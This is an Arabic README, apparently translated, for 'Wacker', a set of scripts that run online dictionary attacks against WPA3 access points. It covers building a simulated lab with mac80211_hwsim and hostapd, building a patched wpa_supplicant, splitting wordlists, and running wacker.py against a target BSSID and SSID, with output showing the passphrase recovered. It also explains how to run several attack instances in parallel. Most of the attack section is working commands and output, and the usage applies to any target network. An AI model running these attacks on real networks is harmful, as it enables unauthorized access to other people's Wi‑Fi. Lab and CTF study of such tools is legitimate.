
أداة اختراق WPA3 باستخدام القاموس
مجموعة من البرامج النصية للمساعدة في تنفيذ هجوم قاموسي عبر الإنترنت ضد نقطة وصول WPA3. يستخدم Wacker واجهة التحكم في wpa_supplicant للتحكم في عمليات البرنامج الخفي للمحاور وللحصول على معلومات الحالة والإشعارات بالأحداث، مما يساعد في النهاية على تسريع محاولات الاتصال أثناء هجمات القوة العمياء.
بدلاً من البحث عن نقطة وصول WPA3 للاختبار، فكر في إعداد بيئة محلية باستخدام mac80211_hwsim (التفاصيل أدناه) أو باستخدام الأجهزة الافتراضية التي يوفرها ملاذ قراصنة الترددات اللاسلكية (RF Hackers Sanctuary) (scoreboard.rfhackers.com).
لإعداد محاكي برمجي خاص بك لأجهزة راديو 802.11، ببساطة قم بتكوين وتحميل وحدة mac80211_hwsim الصحيحة.
# modprobe mac80211_hwsim radios=4
# iwconfig
wlan0 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
wlan1 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
wlan2 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
wlan3 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
اختر إحدى الواجهات الجديدة كنقطة وصول WPA3 الخاصة بك واستخدم ملف التهيئة التالي.
# cat hostapd.conf
interface=wlan0
ssid=WCTF_18
driver=nl80211
hw_mode=g
channel=1
logger_syslog=-1
logger_syslog_level=3
wpa=2
wpa_passphrase=Aeromechanics
wpa_key_mgmt=SAE
rsn_pairwise=CCMP
ieee80211w=2
group_mgmt_cipher=AES-128-CMAC
ثم ابدأ hostapd باستخدام:
# hostapd -K -dd hostapd.conf
إذا كنت تنوي توزيع جهود الاختراق عبر سلسلة من بطاقات الشبكة، فإن البرنامج النصي split.sh المرفق سيقوم بتقسيم قائمة الكلمات لك.
# ./split.sh 10 cyberpunk.words
50916 cyberpunk.words.aaa
50916 cyberpunk.words.aab
50916 cyberpunk.words.aac
50916 cyberpunk.words.aad
50916 cyberpunk.words.aae
50916 cyberpunk.words.aaf
50916 cyberpunk.words.aag
50916 cyberpunk.words.aah
50916 cyberpunk.words.aai
50907 cyberpunk.words.aaj
509151 total
نحن نقدم wpa_supplicant الخاص بنا لضمان تعيين تهيئات معينة بالإضافة إلى بعض التعديلات التي يجب إجراؤها داخل كود المصدر نفسه.
# apt-get install -y pkg-config libnl-3-dev gcc libssl-dev libnl-genl-3-dev
# cp defconfig wpa_supplicant-2.10/wpa_supplicant/.config
# git apply wpa_supplicant.patch
# cd wpa_supplicant-2.10/wpa_supplicant
# make -j4
# ls -al wpa_supplicant
-rwxr-xr-x 1 root root 13541416 May 31 16:30 wpa_supplicant
يتطلب بايثون 3.6 فما فوق
يجب اعتبار Wacker أداة تكميلية لـ airodump أو kismet حيث يتم بالفعل اختيار الهدف. يقوم Wacker بتعطيل المسح الخلفي مع wpa_supplicant عن قصد للمساعدة في تسريع محاولات المصادقة.
البرنامج النصي wacker.py مخصص للقيام بكل العمل الشاق ويتطلب بعض التفاصيل حول الهدف.
# ./wacker.py --help
usage: wacker.py [-h] --wordlist WORDLIST --interface INTERFACE --bssid BSSID
--ssid SSID --freq FREQ [--start START_WORD] [--debug]
A WPA3 dictionary cracker. Must run as root!
optional arguments:
-h, --help show this help message and exit
--wordlist WORDLIST wordlist to use
--interface INTERFACE
interface to use
--bssid BSSID bssid of the target
--ssid SSID the ssid of the WPA3 AP
--freq FREQ frequency of the ap
--start START_WORD word to start with in the wordlist
--debug increase logging output
إذا حالفنا الحظ... تشغيل الهجوم باستخدام مثيل واحد فقط...
# ./wacker.py --wordlist cyberpunk.words --ssid WCTF_18 --bssid 02:00:00:00:00:00 --interface wlan2 --freq 2412
Start time: 21 Aug 2020 07:40:11
Starting wpa_supplicant...
5795 / 509151 words (1.14%) : 79.41 words/sec : 0.020 hours lapsed : 1.76 hours to exhaust (21 Aug 2020 09:25:49)
Found the password: 'Aeromechanics'
Stop time: 21 Aug 2020 07:41:24
تشغيل مثيلات متعددة من wacker سهل إذا كان لديك بطاقات شبكة إضافية. لا تنسَ تقسيم قائمة الكلمات.
# ./wacker.py --wordlist cyberpunk.words.aaa --ssid WCTF_18 --bssid 02:00:00:00:00:00 --interface wlan1 --freq 2412
# ./wacker.py --wordlist cyberpunk.words.aab --ssid WCTF_18 --bssid 02:00:00:00:00:00 --interface wlan2 --freq 2412
# ./wacker.py --wordlist cyberpunk.words.aac --ssid WCTF_18 --bssid 02:00:00:00:00:00 --interface wlan3 --freq 2412
wacker مفصل جدًا. الملفات المهمة موجودة في /tmp/wacker/
لا يتعامل wacker مع قوائم التحكم بالوصول (ACLs) التي تضعها نقطة الوصول WPA3 المستهدفة. وهذا يعني أن الكود الحالي يستخدم دائمًا نفس عنوان MAC. إذا قامت نقطة الوصول الهدف بحظر عنوان MAC الخاص بنا، فلن يميز البرنامج النصي بين فشل المصادقة الحقيقي وبين رفض عنوان MAC المحظور. وهذا يعني أننا سنعتبر كلمة المرور الصحيحة فاشلة. أحد الحلول... سيتعين علينا إضافة macchanger إلى المصدر على حساب التباطؤ.
u631_3: WPA: AP group 0x10 network profile group 0x18; available group 0x10
u631_3: WPA: using GTK CCMP
u631_3: WPA: AP pairwise 0x10 network profile pairwise 0x18; available pairwise 0x10
u631_3: WPA: using PTK CCMP
u631_3: WPA: AP key_mgmt 0x400 network profile key_mgmt 0x400; available key_mgmt 0x400
u631_3: WPA: Failed to select authenticated key management type
u631_3: WPA: Failed to set WPA key management and encryption suites